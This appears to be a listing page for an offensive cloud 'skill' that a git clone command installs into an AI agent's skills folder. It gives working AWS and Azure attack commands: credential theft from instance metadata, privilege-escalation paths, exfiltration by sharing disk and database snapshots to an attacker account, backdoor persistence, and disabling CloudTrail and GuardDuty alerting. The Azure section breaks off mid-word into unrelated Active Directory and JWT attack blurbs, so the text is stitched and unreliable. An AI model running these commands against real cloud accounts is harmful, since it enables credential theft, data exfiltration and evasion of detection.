offensive-cloud
**offensive-cloud** is a comprehensive cloud security attack methodology covering AWS, Azure, and GCP that includes credential harvesting from instance metadata and environment variables, enumeration using cloud-native tools, privilege escalation through IAM policies and role assumptions, persistence mechanisms like backdoor accounts and Lambda layer hijacking, data exfiltration from cloud storage services, and detection evasion techniques. Use this skill during cloud infrastructure penetration testing engagements or when assessing compromised cloud credentials and cloud account security posture.
git clone --depth 1 https://github.com/SnailSploit/Claude-Red /tmp/offensive-cloud && cp -r /tmp/offensive-cloud/Skills/cloud/offensive-cloud ~/.claude/skills/offensive-cloudSKILL.md
# Cloud (AWS / Azure / GCP) — Offensive Testing Methodology
## Quick Workflow
1. Identify the cloud and the identity context you have (user, role, service account, instance role)
2. Enumerate without writes — `aws sts get-caller-identity`, `az account show`, `gcloud auth list`
3. Map permissions to known privilege-escalation primitives (PassRole, Owner, etc.)
4. Find the data and the persistence anchors before alarms fire
5. Document the kill chain with timestamps, identities, and resources for the report
---
## AWS
### Identity Discovery
```bash
aws sts get-caller-identity
aws iam list-attached-user-policies --user-name $(aws sts get-caller-identity --query Arn --output text | awk -F/ '{print $NF}')
aws iam list-attached-role-policies --role-name <role>
aws iam simulate-principal-policy --policy-source-arn $(aws sts get-caller-identity --query Arn --output text) \
--action-names "*"
```
### IMDS Credential Theft
```bash
# IMDSv1 (legacy)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>
# IMDSv2 (modern, requires token)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
http://169.254.169.254/latest/meta-data/iam/security-credentials/
```
From SSRF, IMDSv2 was historically reachable when the SSRF allowed setting custom headers. Modern AWS denies SSRF without `Host: 169.254.169.254` and proper `PUT`-then-`GET` flow — SSRF in 2024+ rarely yields IMDSv2 unless the proxy reflects custom headers.
### Privilege Escalation Paths
| Path | Required Permission | Outcome |
|------|---------------------|---------|
| `iam:PassRole` + `lambda:CreateFunction` | Pass any role to Lambda you create | Run code as that role |
| `iam:PassRole` + `ec2:RunInstances` | Pass any role to EC2 instance | IMDS → role creds |
| `iam:CreatePolicyVersion` + `iam:SetDefaultPolicyVersion` | Edit your own policy | Self-elevate |
| `iam:UpdateAssumeRolePolicy` | On a privileged role | Add yourself as principal |
| `iam:CreateLoginProfile` (on user without one) | Set console password | Console access |
| `iam:CreateAccessKey` (on another user) | Mint keys for someone else | Persistent access |
| `sts:AssumeRole` with `sts:TagSession` to ABAC role | If role trusts session tags | Tag-based escalation |
| `cloudformation:CreateStack` + permissive role | Run any service action | Indirect arbitrary perms |
| `glue:UpdateDevEndpoint` | Inject SSH key into Glue endpoint | Code exec as Glue role |
| `ssm:SendCommand` to any instance | RCE on instances + their roles | Lateral + escalation |
```bash
# Pacu — the tooling for AWS escalation
pacu
> import_keys default
> run iam__enum_permissions
> run iam__privesc_scan
```
### Cross-Account / Organization
```bash
# Find roles trusting the current account
aws iam list-roles --query 'Roles[?AssumeRolePolicyDocument!=null]'
# Then grep AssumeRolePolicyDocument.Statement for trusts to your account
# Org-wide (if Organizations access)
aws organizations list-accounts
aws organizations list-roots
```
### Data Targets
```bash
# S3
aws s3api list-buckets
aws s3 ls s3://<bucket> --recursive | head
aws s3api get-bucket-policy --bucket <bucket>
# Cross-region snapshot share (data exfil without S3)
aws ec2 modify-snapshot-attribute --snapshot-id snap-... \
--attribute createVolumePermission \
--create-volume-permission "Add=[{UserId=ATTACKER_ACCT}]"
# RDS snapshot share
aws rds modify-db-snapshot-attribute --db-snapshot-identifier mysnap \
--attribute-name restore --values-to-add ATTACKER_ACCT
# Secrets Manager / Parameter Store
aws secretsmanager list-secrets
aws ssm get-parameters-by-path --path / --recursive --with-decryption
```
### Persistence
```bash
# Cross-account SCP exemption via service-linked role
# AWS Config snapshot delivery channel rerouted to attacker bucket
aws configservice put-delivery-channel ... # Rare but devastating
# EventBridge rule firing Lambda you control on every IAM change
# Backdoor: Lambda creates an access key for any new admin user
```
### Detection Evasion
- CloudTrail to multi-region with log file validation — disable validation if you have perms
- GuardDuty findings can be muted via `update-findings-feedback` if you have the permission (rare in prod)
- VPC Flow Logs only catch IP traffic; control-plane API calls are CloudTrail-only
---
## Azure
### Identity Discovery
```bash
az account show
az ad signed-in-user show
az role assignment list --all --assignee $(az ad signed-in-user show --query id -o tsv)
# Microsoft Graph
az rest --method GET --uri "https://graph.microsoft.com/v1.0/me"
```
### IMDS
```bash
curl -H "Metadata:true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
```
### Privilege Escalation Paths
| Path | Required Role / Permission | Outcome |
|------|---------------------------|---------|
| User Access Administrator on self/sub | Grant self Owner | Subscription Owner |
| App Registration owner | Add cert/secret, mint app-only tokens | App's permissions |
| Virtual Machine Contributor + Reader on KV | Run command on VM with MSI → KV | Secrets |
| Custom role with `*/write` on RBAC | Edit role assignments | Self-elevate |
| Logic App contributor | Edit workflow → privileged action | Indirect any action |
| Automation Account contributor | RunBook with Run-As account | Run as RunAs identity |
| AAD `Application Administrator` | Assign app to high-priv role | Cloud admin via app |
| AAD `Cloud Application Administrator` | Same minus on-prem | Cloud admin |
| AAD `Directory Synchronization Account` | DCSync via AAD Connect | All on-prem hashes |
| Privileged Authentication Administrator | Reset MFA / passwords for Globals | Global Admin reset |
```bash
# ROADtools — the AAD enumeration toolkit
roadrecon auth -u user@tenant -p pass
roadrecon gather
roadrecon gui # browse the gathered DB
# AzureHouActive Directory attack methodology for internal network red team engagements. Covers reconnaissance (BloodHound, PowerView, ADExplorer), credential abuse (Kerberoasting, ASREProasting, NTLM relay, LLMNR/NBT-NS poisoning), privilege escalation (ACL abuse, GPO abuse, unconstrained/constrained delegation), lateral movement (Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, WMI/WinRM/PsExec), persistence (Golden/Silver/Diamond Tickets, DCSync, DCShadow, AdminSDHolder, Skeleton Key), forest trust attacks, ADCS abuse (ESC1-ESC15), and modern MDI/Defender for Identity evasion. Use when assessing on-prem AD, hybrid AD/Entra ID environments, or ADCS deployments.
JWT attack methodology for penetration testers. Covers algorithm confusion (alg:none, RS256→HS256), weak HMAC secret brute force, kid parameter injection (SQLi, path traversal), jku/x5u/jwk header injection, JWKS cache poisoning, JWS/JWE confusion, timing attacks, and mobile JWT storage extraction. Use when testing JWT-based authentication, hunting auth bypass via token manipulation, or evaluating JWT implementation security in web or mobile apps.